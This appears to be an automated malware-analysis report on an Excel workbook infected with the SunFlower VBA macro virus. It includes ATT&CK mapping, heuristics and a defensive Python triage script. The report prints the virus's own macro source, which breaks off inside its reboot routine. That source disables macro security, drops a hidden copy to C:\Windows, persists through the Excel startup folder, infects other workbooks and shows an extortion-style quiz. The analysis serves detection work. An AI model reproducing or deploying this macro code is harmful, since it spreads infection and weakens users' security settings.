Verdict: MALICIOUS (risk score 188)

Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1562.001 Impair Defenses: Disable or Modify Tools
T1564.001 Hide Artifacts: Hidden Files and Directories
The sample is an Excel workbook whose ThisWorkbook module carries a self-replicating VBA macro; its own comment names it the SunFlower virus by "Yello & WalruS" (September 2000). On `Workbook_Deactivate` it suppresses alerts and screen updates (the `(5 * 2 - 10)` expressions evaluate to 0, i.e. False), disables the Tools > Macro > Security... menu item and sets `Level` to 1 (low) under `HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security`. That key is Word 2000's, and `System.PrivateProfileString` is a Word object-model member, so in Excel this step likely fails silently under `On Error Resume Next`. It then writes the first 110 lines of its own module to `C:\Windows\xedit.drv`, marks that file hidden and system (`SetAttr ..., 6`), and, if no `Book1.` exists in `Application.StartupPath` (the XLSTART folder), saves a copy of itself there so it is loaded by every Excel session. Finally it checks the active workbook's ThisWorkbook module for the `' MarshYello` marker on line 3; if absent it deletes the module, loads `xedit.drv` into it with `AddFromFile`, and saves the workbook. `xedit.drv` is therefore the infection source for other workbooks, not a downloaded second stage: nothing in the recovered macro fetches or executes an external payload. A time-gated payload (`Second(Now) > 58`) shows Office Assistant balloons and a three-question quiz; the declared `ExitWindowsEx` import with `EWX_REBOOT` and the `KickOut` routine point to a forced reboot after repeated wrong answers, but that routine is cut off in the preview. The `CreateObject` call reported by the heuristics does not occur in the visible part of the preview. The ClamAV signatures Win.Trojan.Psycho-3 on the container and Win.Trojan.SunFlower-1 on the carved macro module corroborate the verdict.
Heuristics (4)
- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- OLE_VBA_MACROS (medium, 1 related finding): Document contains VBA macro code
- OLE_VBA_CREATEOBJ (high): CreateObject call
- SE_URGENCY_LURE (low): Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.); useful context, but low-signal without other findings
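The following Python script is an added example, not code from the report or from the analyzer that produced it. It performs the triage a practitioner would run on the carved `macros.bas`: it matches the self-replication, startup-path persistence, macro-security and hidden-file indicators described in the summary above against a constructed excerpt of the macro, lists the paths the macro writes to, and folds the `(5 * 2 - 10)` style constant arithmetic the sample uses in place of `False`. The excerpt, the indicator regexes, the severities and the ATT&CK mapping are the example's own assumptions; on a real case the module text would come from olevba output instead of the embedded string.

```python
"""Static triage of an extracted VBA module. Added example for this page, not
the analyzer's own code; indicator set, severities and ATT&CK mapping are the
example author's choices."""
from __future__ import annotations
import ast
import re
from dataclasses import dataclass

# Constructed excerpt modelled on the macro preview in the report: only the
# behaviour-bearing lines, without the quiz payload. Not the full sample.
SAMPLE_VBA = r'''Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Sub Workbook_Deactivate()
On Error Resume Next
.DisplayAlerts = (5 * 2 - 10)
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Open "C:\Windows\xedit.drv" For Output As #1
Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 110)
SetAttr ("C:\Windows\xedit.drv"), 6
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
ActiveWB.AddFromFile ("C:\Windows\xedit.drv")
End Sub
'''

# (name, per-line regex, ATT&CK technique or plain label, severity). VBA is
# case-insensitive, so every pattern is matched with re.IGNORECASE.
INDICATORS = [
    ("dumps its own module source (CodeModule.Lines)", r"\.Lines\(\s*\d+\s*,\s*\d+\s*\)", "self-replication", "high"),
    ("loads module code from a file (AddFromFile)", r"\.AddFromFile\b", "self-replication", "high"),
    ("saves itself into the Office startup path", r"\bSaveAs\b.*Application\.StartupPath", "T1547.001 Registry Run Keys / Startup Folder", "high"),
    ("lowers the Office macro security Level", r"Office\\\d+(?:\.\d+)?\\\w+\\Security", "T1562.001 Disable or Modify Tools", "high"),
    ("disables the Security... menu item", r'Controls\("Security\.\.\."\)\.Enabled\s*=\s*False', "T1562.001 Disable or Modify Tools", "medium"),
    ("marks a dropped file hidden+system (SetAttr 6)", r"\bSetAttr\b.*,\s*6\b", "T1564.001 Hidden Files and Directories", "medium"),
    ("imports ExitWindowsEx (forced reboot/shutdown)", r"\bDeclare\s+Function\s+ExitWindowsEx\b", "T1529 System Shutdown/Reboot", "medium"),
    ("suppresses errors (On Error Resume Next)", r"^On\s+Error\s+Resume\s+Next", "error suppression (low signal alone)", "low"),
]


@dataclass(frozen=True)
class Finding:
    name: str
    technique: str
    severity: str
    line_no: int
    evidence: str


def triage(vba_text: str) -> list[Finding]:
    """Run every indicator over every stripped source line; one Finding per hit."""
    findings = []
    for line_no, raw in enumerate(vba_text.splitlines(), start=1):
        line = raw.strip()
        for name, pattern, technique, severity in INDICATORS:
            if re.search(pattern, line, re.IGNORECASE):
                findings.append(Finding(name, technique, severity, line_no, line))
    return findings


_OPEN_RE = re.compile(r'\bOpen\s+"([^"]+)"\s+For\s+(?:Output|Append|Binary)', re.IGNORECASE)
_SAVEAS_RE = re.compile(r"\bSaveAs\b.*?Filename:=\s*([^,]+)", re.IGNORECASE)


def dropped_paths(vba_text: str) -> list[str]:
    """Write targets: Open ... For Output literals and the SaveAs Filename
    expression (kept symbolic when it is built from Application.StartupPath)."""
    paths = []
    for line in vba_text.splitlines():
        for rx in (_OPEN_RE, _SAVEAS_RE):
            m = rx.search(line)
            if m:
                paths.append(m.group(1).strip())
    return paths


_CONST_EXPR_RE = re.compile(r"\(\s*(\d+(?:\s*[-+*]\s*\d+)+)\s*\)")


def _safe_int_eval(expr: str) -> int:
    """Evaluate integer +, -, * arithmetic only; any other AST node is rejected."""
    tree = ast.parse(expr, mode="eval")
    for node in ast.walk(tree):
        if isinstance(node, (ast.Expression, ast.BinOp, ast.Add, ast.Sub, ast.Mult)):
            continue
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            continue
        raise ValueError(f"unsupported node in constant expression: {type(node).__name__}")
    return eval(compile(tree, "<const>", "eval"))  # only int literals and +,-,* survive the walk


def fold_constants(vba_text: str) -> str:
    """Rewrite parenthesised integer arithmetic such as (5 * 2 - 10) to its value,
    so .DisplayAlerts = (5 * 2 - 10) reads as .DisplayAlerts = 0 (False)."""
    return _CONST_EXPR_RE.sub(lambda m: str(_safe_int_eval(m.group(1))), vba_text)


def verdict(findings: list[Finding]) -> str:
    """Self-replication plus startup-path persistence is a macro virus; otherwise
    any high-severity hit is merely suspicious."""
    techniques = {f.technique for f in findings}
    if "self-replication" in techniques and any(t.startswith("T1547") for t in techniques):
        return "malicious: self-replicating macro with persistence"
    if any(f.severity == "high" for f in findings):
        return "suspicious"
    return "no high-confidence indicators"
```

`triage(SAMPLE_VBA)` yields two self-replication hits, the startup-path SaveAs, two T1562.001 hits, the hidden-file SetAttr and the ExitWindowsEx import, and `dropped_paths` returns the literal `C:\Windows\xedit.drv` beside the symbolic `Application.StartupPath & "\Book1."`, which is exactly the pair an incident responder needs to sweep for on affected hosts.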
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6044 bytes | c587b4a903c0e16ae0e8b0b5d328a76e8a3f6fe9d2943dcb879343081f062c22 | ClamAV: Win.Trojan.SunFlower-1 | unlikely |
Preview script (first 1,000 lines of the extracted script; the sample is shown as carved, with indentation restored for readability)

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Const EWX_REBOOT = 2
' MarshYello
Private Sub Workbook_Deactivate()
    ' SunFlower virus By Yello & WalruS (Sept 2000)
    On Error Resume Next
    With Application
        .DisplayAlerts = (5 * 2 - 10)
        .Application.ScreenUpdating = (5 * 2 - 10)
        .Application.DisplayStatusBar = (5 * 2 - 10)
    End With
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Open "C:\Windows\xedit.drv" For Output As #1
    Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 110)
    Close #1
    SetAttr ("C:\Windows\xedit.drv"), 6
    Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    CheckExist = Dir(Application.StartupPath & "\Book1.")
    If CheckExist = "" Then
        VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
    End If
    If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
        ActiveWB.DeleteLines 1, ActiveWB.CountofLines
        ActiveWB.AddFromFile ("C:\Windows\xedit.drv")
        ActiveWorkbook.Save
    End If
    If Second(Now) > 58 Then Call PayloadOne
End Sub
Private Sub PayloadOne()
    Assistant.Visible = True
    With Assistant.NewBalloon
        .Icon = msoIconAlertWarning
        .Text = "SunFlower Virus"
        .Heading = "Yello & WalruS Have You!"
        .Show
    End With
    MsgBox "Hello there " + Application.UserName + Chr(13) + Chr(13) + "Yello & WalruS have control of you P.C." + Chr(13) + Chr(13) + "We have temporally hidden some of your important windows files." + Chr(13) + Chr(13) + "Re-boot now and your P.C will never be the same" + Chr(13) + Chr(13) + "Do yourself a favour and answer our questions" + Chr(13) + Chr(13) + "Get them right and your files will be restored" + Chr(13) + Chr(13) + "Get them wrong and its godnight vienna", vbCritical, "SunFlower Virus"
    question1 = "Divide 30 by 1/2 and add 10. What is the answer ?"
    question2 = "Name one of the authors of this virus ?"
    question3 = "What does the 'V' stand for in DVD ?"
    Count = 1
    Do
        Q1 = InputBox("O.k, Question 1" + Chr(13) + Chr(13) + question1, "SunFlower Virus")
        Count = Count + 1
    Loop Until Q1 = "70"
    Count = 1
    Do
        Q2 = InputBox("O.k, Question 2 a bit harder this time" + Chr(13) + Chr(13) + question2, "SunFlower Virus")
        Count = Count + 1
        If Count = 5 Then MsgBox "Hint: One's a colour!", vbInformation, "I Am The ........."
    Loop Until Q2 = "Walrus" Or Q2 = "walrus" Or Q2 = "Yello" Or Q2 = "yello" Or Q2 = "Yellow" Or Q2 = "yellow"
    Count = 1
    Do
        If Count = 3 Then MsgBox "Last Chance", vbInformation, "SunFlower Virus"
        If Count = 4 Then Call KickOut
        Q3 = InputBox("O.k, Question 3, Get this correct and your home and dry " + Chr(13) + Chr(13) + question3, "SunFlower Virus")
        Count = Count + 1
    Loop Until Q3 = "Versatile" Or Q3 = "versatile"
    Assistant.Visible = True
    With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Text = "Well done. Be Alert...."
        .Heading = "Yello & WalruS have left the building" + Chr(13) + " Or have they ?"
        .Show
    End With
    Assistant.Animation = msoAnimationGetTechy
End Sub
Private Sub KickOut()
    Dim i As Integer
    On Error Resume Next
    MsgBox "Is it " & Time & " Already ?" + Chr(13) + Chr(13) + "Ive got to go", vbCritical, "Brain D
```

... (truncated)